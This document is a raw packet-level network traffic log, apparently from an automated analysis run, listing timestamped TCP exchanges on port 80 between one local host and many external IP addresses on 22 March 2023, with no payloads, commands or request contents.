Mar 22, 2023 05:43:31.522399902 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.522439957 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.522444963 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.524846077 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.542009115 CET	49839	80	192.168.2.5	64.125.133.18
Mar 22, 2023 05:43:31.551383972 CET	49837	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:31.571124077 CET	80	49836	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:31.571414948 CET	49836	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:31.607110977 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:31.609004021 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:31.626997948 CET	80	49838	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:31.627993107 CET	80	49838	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:31.628142118 CET	49838	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:31.628559113 CET	80	49838	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:31.632457972 CET	49838	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:31.685439110 CET	49838	80	192.168.2.5	69.163.218.51
Mar 22, 2023 05:43:31.689446926 CET	80	49837	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:31.751730919 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.751806021 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.751923084 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.751940012 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.751944065 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.752017975 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752088070 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752110004 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.752145052 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752238035 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752250910 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.752305031 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752361059 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.752363920 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752439976 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752494097 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.752533913 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752585888 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.752590895 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752640009 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752693892 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.752697945 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752777100 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752831936 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.752835035 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752886057 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.752896070 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.752981901 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.753037930 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.753038883 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.753118038 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.753165960 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.753174067 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.753221035 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.779458046 CET	49840	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:31.812546015 CET	49841	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:31.812833071 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:31.817656994 CET	80	49771	93.187.206.66	192.168.2.5
Mar 22, 2023 05:43:31.817748070 CET	49771	80	192.168.2.5	93.187.206.66
Mar 22, 2023 05:43:31.854820013 CET	80	49838	69.163.218.51	192.168.2.5
Mar 22, 2023 05:43:31.876032114 CET	49843	80	192.168.2.5	65.9.95.105
Mar 22, 2023 05:43:31.887517929 CET	80	49840	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:31.887645006 CET	49840	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:31.888736010 CET	49840	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:31.905227900 CET	80	49843	65.9.95.105	192.168.2.5
Mar 22, 2023 05:43:31.905320883 CET	49843	80	192.168.2.5	65.9.95.105
Mar 22, 2023 05:43:31.905648947 CET	49843	80	192.168.2.5	65.9.95.105
Mar 22, 2023 05:43:31.907696962 CET	49844	80	192.168.2.5	147.154.3.56
Mar 22, 2023 05:43:31.912769079 CET	49845	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:31.934690952 CET	80	49843	65.9.95.105	192.168.2.5
Mar 22, 2023 05:43:31.935019970 CET	80	49843	65.9.95.105	192.168.2.5
Mar 22, 2023 05:43:31.936485052 CET	49843	80	192.168.2.5	65.9.95.105
Mar 22, 2023 05:43:31.948360920 CET	80	49845	188.166.152.188	192.168.2.5
Mar 22, 2023 05:43:31.950381041 CET	49845	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:31.963238955 CET	80	49841	104.196.26.65	192.168.2.5
Mar 22, 2023 05:43:31.965106964 CET	49841	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:31.974245071 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:31.974534988 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:31.996777058 CET	80	49840	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:31.997611046 CET	80	49840	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:31.997705936 CET	49840	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:31.998392105 CET	80	49840	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:31.998475075 CET	49840	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:32.019706964 CET	80	49844	147.154.3.56	192.168.2.5
Mar 22, 2023 05:43:32.019817114 CET	49844	80	192.168.2.5	147.154.3.56
Mar 22, 2023 05:43:32.028378010 CET	49841	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:32.028664112 CET	49845	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:32.028665066 CET	49840	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:32.028891087 CET	49843	80	192.168.2.5	65.9.95.105
Mar 22, 2023 05:43:32.057856083 CET	80	49843	65.9.95.105	192.168.2.5
Mar 22, 2023 05:43:32.058027983 CET	80	49843	65.9.95.105	192.168.2.5
Mar 22, 2023 05:43:32.058115959 CET	49843	80	192.168.2.5	65.9.95.105
Mar 22, 2023 05:43:32.063549042 CET	80	49845	188.166.152.188	192.168.2.5
Mar 22, 2023 05:43:32.064661026 CET	80	49845	188.166.152.188	192.168.2.5
Mar 22, 2023 05:43:32.064805031 CET	49845	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:32.067513943 CET	80	49798	62.122.190.121	192.168.2.5
Mar 22, 2023 05:43:32.067599058 CET	49798	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:32.086093903 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.086208105 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.137063026 CET	80	49840	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:32.164186954 CET	49844	80	192.168.2.5	147.154.3.56
Mar 22, 2023 05:43:32.180396080 CET	80	49841	104.196.26.65	192.168.2.5
Mar 22, 2023 05:43:32.180460930 CET	80	49841	104.196.26.65	192.168.2.5
Mar 22, 2023 05:43:32.180655003 CET	49841	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:32.192621946 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.276371002 CET	80	49844	147.154.3.56	192.168.2.5
Mar 22, 2023 05:43:32.288472891 CET	80	49844	147.154.3.56	192.168.2.5
Mar 22, 2023 05:43:32.288609028 CET	80	49844	147.154.3.56	192.168.2.5
Mar 22, 2023 05:43:32.288695097 CET	49844	80	192.168.2.5	147.154.3.56
Mar 22, 2023 05:43:32.423142910 CET	49841	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:32.498761892 CET	49821	80	192.168.2.5	193.166.255.171
Mar 22, 2023 05:43:32.501176119 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.501262903 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.501315117 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.501329899 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.501358032 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.501393080 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.501430988 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.502409935 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.574287891 CET	80	49841	104.196.26.65	192.168.2.5
Mar 22, 2023 05:43:32.575036049 CET	80	49841	104.196.26.65	192.168.2.5
Mar 22, 2023 05:43:32.576836109 CET	49841	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:32.738581896 CET	49847	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:32.738651037 CET	49846	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:32.757253885 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:32.759902000 CET	80	49847	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:32.759949923 CET	80	49846	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:32.760076046 CET	49847	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:32.760319948 CET	49846	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:32.762299061 CET	49847	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:32.762310982 CET	49846	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:32.773031950 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.773085117 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.773117065 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.773132086 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.773143053 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.773180008 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.773184061 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.773224115 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.773236036 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.773269892 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.773269892 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.773473978 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.774138927 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.774190903 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:32.774254084 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:32.783679008 CET	80	49847	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:32.783852100 CET	80	49846	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:32.794033051 CET	80	49846	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:32.794101954 CET	49846	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:32.808528900 CET	49849	80	192.168.2.5	23.227.38.74
Mar 22, 2023 05:43:32.829952002 CET	80	49849	23.227.38.74	192.168.2.5
Mar 22, 2023 05:43:32.830302954 CET	49849	80	192.168.2.5	23.227.38.74
Mar 22, 2023 05:43:32.830734015 CET	49849	80	192.168.2.5	23.227.38.74
Mar 22, 2023 05:43:32.852180004 CET	80	49849	23.227.38.74	192.168.2.5
Mar 22, 2023 05:43:32.854147911 CET	49846	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:32.860102892 CET	49850	80	192.168.2.5	198.100.146.220
Mar 22, 2023 05:43:32.882344007 CET	80	49846	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:32.882669926 CET	49846	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:32.894809961 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:32.894901991 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:32.984956026 CET	80	49849	23.227.38.74	192.168.2.5
Mar 22, 2023 05:43:32.985045910 CET	49849	80	192.168.2.5	23.227.38.74
Mar 22, 2023 05:43:33.044817924 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.044852018 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.044877052 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.044899940 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.044925928 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.044950962 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.044969082 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:33.044975042 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.044995070 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.044997931 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:33.045012951 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.045049906 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.045068026 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.045084953 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.045191050 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:33.045624018 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.045650005 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.045672894 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.045686007 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:33.045697927 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.045730114 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:33.045758963 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:33.120522976 CET	80	49847	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:33.120611906 CET	80	49847	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:33.120737076 CET	49847	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:33.249377012 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.296910048 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.318464041 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.318505049 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.318531036 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.318557024 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.318582058 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.318602085 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:33.318607092 CET	80	49842	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:33.318656921 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:33.318656921 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:33.318681002 CET	49842	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:33.320179939 CET	49847	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:33.322372913 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:33.341679096 CET	80	49847	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:33.345962048 CET	80	49851	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:33.346365929 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:33.387062073 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.387123108 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.423101902 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:33.434638977 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.446876049 CET	80	49851	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:33.447349072 CET	80	49851	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:33.449027061 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:33.477911949 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:33.502266884 CET	80	49851	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:33.502453089 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:33.508389950 CET	49852	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:33.508584976 CET	80	49847	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:33.508636951 CET	80	49847	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:33.508725882 CET	49847	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:33.508800030 CET	49847	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:33.510380030 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:33.534354925 CET	80	49851	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:33.534449100 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:33.539012909 CET	49853	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:33.539057016 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:33.563133001 CET	80	49851	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:33.563229084 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:33.573537111 CET	49854	80	192.168.2.5	103.224.182.241
Mar 22, 2023 05:43:33.650010109 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:33.674312115 CET	80	49851	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:33.677345037 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:33.714909077 CET	80	49853	208.109.214.162	192.168.2.5
Mar 22, 2023 05:43:33.717572927 CET	49853	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:33.736246109 CET	49853	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:33.740518093 CET	80	49854	103.224.182.241	192.168.2.5
Mar 22, 2023 05:43:33.740986109 CET	49854	80	192.168.2.5	103.224.182.241
Mar 22, 2023 05:43:33.793426991 CET	80	49779	195.78.66.50	192.168.2.5
Mar 22, 2023 05:43:33.794465065 CET	49779	80	192.168.2.5	195.78.66.50
Mar 22, 2023 05:43:33.795608044 CET	80	49852	103.3.1.161	192.168.2.5
Mar 22, 2023 05:43:33.795722961 CET	49852	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:33.803802967 CET	49854	80	192.168.2.5	103.224.182.241
Mar 22, 2023 05:43:33.815516949 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.815574884 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.815650940 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.818152905 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.818219900 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.818240881 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.818279982 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.818280935 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.818339109 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.818340063 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.818397045 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.818417072 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.818476915 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.818584919 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.818643093 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.818649054 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.818727016 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.821800947 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.821890116 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.834245920 CET	49852	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:33.912018061 CET	80	49853	208.109.214.162	192.168.2.5
Mar 22, 2023 05:43:33.912507057 CET	80	49853	208.109.214.162	192.168.2.5
Mar 22, 2023 05:43:33.912714005 CET	49853	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:33.953171015 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.953196049 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.953363895 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.958019972 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.958045006 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.958107948 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.961548090 CET	49853	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:33.968317032 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.968342066 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.968468904 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.968482971 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.977303028 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.977329016 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.977458954 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.977478981 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.987035036 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.987061977 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.987171888 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.987186909 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.996670008 CET	80	49854	103.224.182.241	192.168.2.5
Mar 22, 2023 05:43:33.996691942 CET	80	49854	103.224.182.241	192.168.2.5
Mar 22, 2023 05:43:33.996716022 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.996738911 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:33.996763945 CET	49854	80	192.168.2.5	103.224.182.241
Mar 22, 2023 05:43:33.996866941 CET	49854	80	192.168.2.5	103.224.182.241
Mar 22, 2023 05:43:33.996866941 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.996882915 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:33.997082949 CET	49854	80	192.168.2.5	103.224.182.241
Mar 22, 2023 05:43:34.006298065 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.006321907 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.006392002 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:34.015901089 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.015922070 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.016022921 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:34.025784969 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.025809050 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.025896072 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:34.025896072 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:34.035309076 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.035339117 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.035408020 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:34.090585947 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.090606928 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.090806961 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:34.095410109 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.095431089 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.095629930 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:34.106039047 CET	80	49848	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:34.109407902 CET	49848	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:34.120626926 CET	80	49852	103.3.1.161	192.168.2.5
Mar 22, 2023 05:43:34.122359037 CET	80	49852	103.3.1.161	192.168.2.5
Mar 22, 2023 05:43:34.122446060 CET	49852	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:34.137679100 CET	80	49853	208.109.214.162	192.168.2.5
Mar 22, 2023 05:43:34.137814999 CET	49853	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:34.163826942 CET	80	49854	103.224.182.241	192.168.2.5
Mar 22, 2023 05:43:34.285871983 CET	49852	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:34.302959919 CET	80	49752	104.196.26.65	192.168.2.5
Mar 22, 2023 05:43:34.303736925 CET	49752	80	192.168.2.5	104.196.26.65
Mar 22, 2023 05:43:34.334207058 CET	49855	80	192.168.2.5	210.140.73.39
Mar 22, 2023 05:43:34.336911917 CET	80	49817	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:34.337029934 CET	49817	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:34.363177061 CET	49856	80	192.168.2.5	93.187.206.66
Mar 22, 2023 05:43:34.457391977 CET	80	49856	93.187.206.66	192.168.2.5
Mar 22, 2023 05:43:34.457525015 CET	49856	80	192.168.2.5	93.187.206.66
Mar 22, 2023 05:43:34.457928896 CET	49856	80	192.168.2.5	93.187.206.66
Mar 22, 2023 05:43:34.552176952 CET	80	49856	93.187.206.66	192.168.2.5
Mar 22, 2023 05:43:34.552354097 CET	80	49856	93.187.206.66	192.168.2.5
Mar 22, 2023 05:43:34.553067923 CET	49856	80	192.168.2.5	93.187.206.66
Mar 22, 2023 05:43:34.574218988 CET	80	49852	103.3.1.161	192.168.2.5
Mar 22, 2023 05:43:34.575423956 CET	80	49852	103.3.1.161	192.168.2.5
Mar 22, 2023 05:43:34.576148033 CET	49852	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:34.636729002 CET	80	49813	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:34.637025118 CET	49813	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:34.664624929 CET	49839	80	192.168.2.5	64.125.133.18
Mar 22, 2023 05:43:35.097320080 CET	49857	80	192.168.2.5	96.91.204.114
Mar 22, 2023 05:43:35.108453035 CET	80	49822	69.163.239.62	192.168.2.5
Mar 22, 2023 05:43:35.108547926 CET	49822	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:35.148833036 CET	80	49825	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:35.150679111 CET	49825	80	192.168.2.5	108.167.164.216
